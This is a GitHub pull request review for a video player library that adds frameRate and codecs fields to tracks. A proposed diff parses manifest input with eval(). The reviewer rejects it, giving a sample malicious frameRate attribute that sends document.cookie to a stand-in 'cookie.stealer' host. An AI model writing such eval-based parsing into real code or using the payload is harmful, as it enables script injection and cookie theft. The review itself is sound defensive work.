### PR TITLE
Provide framerate and codecs information on video tracks

### PR DESCRIPTION
**Pull request by birme**
Solves #516

### CODE REVIEW

File: externs/shaka/player.js [hunk 1]
```diff
@@ -129,6 +131,11 @@ shakaExtern.Stats;
  *   (only for video tracks) The width of the track in pixels.
  * @property {?number} height
  *   (only for video tracks) The height of the track in pixels.
+ * @property {?number} frameRate
+ *   (only for video tracks) The video framerate provided in the manifest.
+ * @property {?string} codecs
+ *   (only for audio and video tracks) The audio/video codecs string provided
```
Comment (joeyparrish) [inline externs/shaka/player.js]: Text streams can also have a codecs string, although it is not always required.  I suggest dropping the parenthetical statement and adding the caveat "if present" after "in the manifest".

File: externs/shaka/player.js [hunk 2]
```diff
@@ -129,6 +131,11 @@ shakaExtern.Stats;
  *   (only for video tracks) The width of the track in pixels.
  * @property {?number} height
  *   (only for video tracks) The height of the track in pixels.
+ * @property {?number} frameRate
+ *   (only for video tracks) The video framerate provided in the manifest.
```
Comment (joeyparrish) [inline externs/shaka/player.js]: This information is not required or used in streaming or setup, so how about"provided in the manifest, if present."

File: lib/dash/dash_parser.js [hunk 3]
```diff
@@ -810,6 +813,7 @@ shaka.dash.DashParser.prototype.parseAdaptationSet_ = function(context, elem) {
     }
   }
 
+
```
Comment (joeyparrish) [inline lib/dash/dash_parser.js]: Style nit: drop this extra line, please

File: lib/dash/dash_parser.js [hunk 4]
```diff
@@ -998,15 +1003,22 @@ shaka.dash.DashParser.prototype.createFrame_ = function(
...
   var parseNumber = XmlUtils.parseNonNegativeInt;
+  var parseFloat = XmlUtils.parseFloat;
   var uris = XmlUtils.findChildren(elem, 'BaseURL').map(XmlUtils.getContents);
 
   var contentType = elem.getAttribute('contentType') || parent.contentType;
   var mimeType = elem.getAttribute('mimeType') || parent.mimeType;
+  var frameRate = XmlUtils.parseAttr(elem, 'frameRate',
+      function(expr) {
+        // frameRate can be an expression e.g. "1000000/42000"
+        return parseFloat(String(eval(expr)));
```
Comment (joeyparrish) [inline lib/dash/dash_parser.js]: Sorry, but for security reasons, we will absolutely not accept "eval".

Imagine somebody sends you a manifest with:

```xml
<Representation
  frameRate="window.href='http://cookie.stealer/?'+document.cookie"
/>
```

Or literally any other malicious thing you can think of: full-screen ads, redirection to a phishing site, anything.

If you need to parse a fraction, you'll have to write a parser.  Perhaps you could add it to XmlUtils.

File: lib/offline/offline_utils.js [hunk 5]
```diff
@@ -47,7 +47,9 @@ shaka.offline.OfflineUtils.getStoredContent = function(manifest) {
         language: stream.language,
         kind: stream.kind || null,
         width: stream.width,
-        height: stream.height
+        height: stream.height,
+        frameRate: stream.frameRate || null,
```
Comment (joeyparrish) [inline lib/offline/offline_utils.js]: You'll need to add frameRate and codecs to the externs for streams stored in the database (shakaExtern.StreamDB), and you'll need to add these properties to the code which stores streams offline (shaka.offline.Storage.prototype.createStream_).

File: lib/dash/dash_parser.js (hunk 4 above)
Comment (birme) [inline lib/dash/dash_parser.js]: Oh, of course. Very sorry about this. Don't know what I was thinking. Will fix this of course

File: lib/util/xml_utils.js [hunk 6]
```diff
@@ -228,3 +228,22 @@ shaka.util.XmlUtils.parseFloat = function(floatString) {
...
+ *   The expression to evaluate, e.g. "200/2". Can also be a single number
+ * @return {?number} The evaluated expression as floating point number on
+ *   success; otherwise return null.
+ */
+shaka.util.XmlUtils.evalDivision = function(exprString) {
+  var res;
+  var n;
+  if (res = exprString.match(/^(\d+)\/(\d+)$/)) {
+    n = Number(res[1] / res[2]);
+  } else if (res = exprString.match(/^([0-9]\.)$/)) {
```
Comment (joeyparrish) [inline lib/util/xml_utils.js]: With this match, Number(res[1]) is the same as Number(exprString), so I would just drop this else if completely.

File: test/dash/dash_parser_manifest_unit.js [hunk 7]
```diff
@@ -136,13 +136,15 @@ describe('DashParser.Manifest', function() {
                 .presentationTimeOffset(0)
                 .mime('video/mp4', 'avc1.4d401f')
                 .bandwidth(100)
+                .frameRate(23.80952380952380952380)
```
Comment (joeyparrish) [inline test/dash/dash_parser_manifest_unit.js]: The precision here is worrying.  Are all of these digits required to get a match out of Jasmine?

Comment (birme) [inline test/dash/dash_parser_manifest_unit.js]: To be honest I haven't tested with a lower precision so I don't know if all of these digits are required

Comment (birme) [inline test/dash/dash_parser_manifest_unit.js]: I did a test and it seems that Jasmine requires full precision here.

Comment (joeyparrish) [inline test/dash/dash_parser_manifest_unit.js]: Okay, then.  Please add a comment like:

```js
// TODO: get Jasmine to match with less precision
```

And my team will work on it later.

**Comment by joeyparrish** [comment]
Thanks!

**Pull request merged**